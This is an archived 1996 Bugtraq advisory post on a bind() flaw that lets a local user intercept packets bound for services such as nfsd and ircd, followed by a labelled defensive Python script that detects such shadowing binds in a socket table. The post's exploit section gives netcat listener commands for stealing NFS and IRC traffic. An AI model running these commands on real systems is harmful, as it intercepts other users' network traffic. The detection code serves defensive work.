Bugtraq mailing list archives

Re: BoS: bind() Security Problems


From: Bernd.Lehle () RUS Uni-Stuttgart DE (Bernd Lehle)
Date: Wed, 31 Jan 1996 13:18:29 +0100




              System Call: bind()
  Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
                           Probably others.
              Requirement: account on system.
      Security Compromise: Stealing packets from
                           nfsd, yppasswd, ircd, etc.
                  Credits: *Hobbit* <hobbit () avian org>
                           bitblt <bitblt () infosoc com>
                           Aleph One <aleph1 () underground org>
                 Synopsis: bind() does not properly check
                           to make sure there is not a socket
                           already bound to INADDR_ANY on the same
                           port when binding to a specific address.


IRIX 5.3 is vulnerable, too.

Exploit:
[..]
Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

To take a look at irc packets: nc -v -v -l -s Your.IP.Address -p 6667

--
Bernd Lehle - Stuttgart University Computer Center * A supercomputer <
      Visualization / SFB 382 / Astrophysics       *  is a machine   <
lehle () rus uni-stuttgart de   Tel:+49-711-685-5531  *  that runs an   <
  http://www.tat.physik.uni-tuebingen.de/~lehle    *  endless loop   <
 pgp? -> finger bernd () visbl rus uni-stuttgart de   *  in 2 seconds   <
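
A defensive check for the condition in the synopsis above, as an added example that is not part of the original post: it scans a socket table for ports where a specific-address bind owned by a different uid sits beside an INADDR_ANY bind on the same port. It assumes the Linux /proc/net/udp layout on a little-endian host; the sample rows, uids and inode numbers are constructed, and the function names are hypothetical.

```python
import socket
import struct
from collections import defaultdict

# Constructed sample in Linux /proc/net/udp layout (little-endian host assumed).
# 0801 = port 2049 (nfsd), 05D158C0 = 192.88.209.5, uid is the 8th column.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0801 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1101
   1: 05D158C0:0801 00000000:0000 07 00000000:00000000 00:00000000 00000000  1000        0 2202
   2: 00000000:006F 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1102
   3: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1103
"""

def parse_sockets(text):
    """Yield (ip, port, uid) for each socket row, skipping the header."""
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 8:
            continue  # malformed or truncated row
        hex_ip, hex_port = cols[1].split(":")
        # The kernel prints the address as a host-order 32-bit hex value.
        ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
        yield ip, int(hex_port, 16), int(cols[7])

def find_shadowed_ports(text):
    """Report ports where a specific-address bind by another uid sits
    beside a wildcard (INADDR_ANY) bind on the same port."""
    by_port = defaultdict(list)
    for ip, port, uid in parse_sockets(text):
        by_port[port].append((ip, uid))
    findings = []
    for port, binds in sorted(by_port.items()):
        wildcard_uids = {uid for ip, uid in binds if ip == "0.0.0.0"}
        if not wildcard_uids:
            continue  # no INADDR_ANY listener, nothing to shadow
        for ip, uid in binds:
            if ip != "0.0.0.0" and uid not in wildcard_uids:
                findings.append((port, ip, uid))
    return findings

if __name__ == "__main__":
    for port, ip, uid in find_shadowed_ports(SAMPLE):
        print(f"port {port}: uid {uid} bound {ip} over a wildcard listener")
```

On a live Linux host the same function can be fed the contents of /proc/net/udp instead of the constructed sample.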


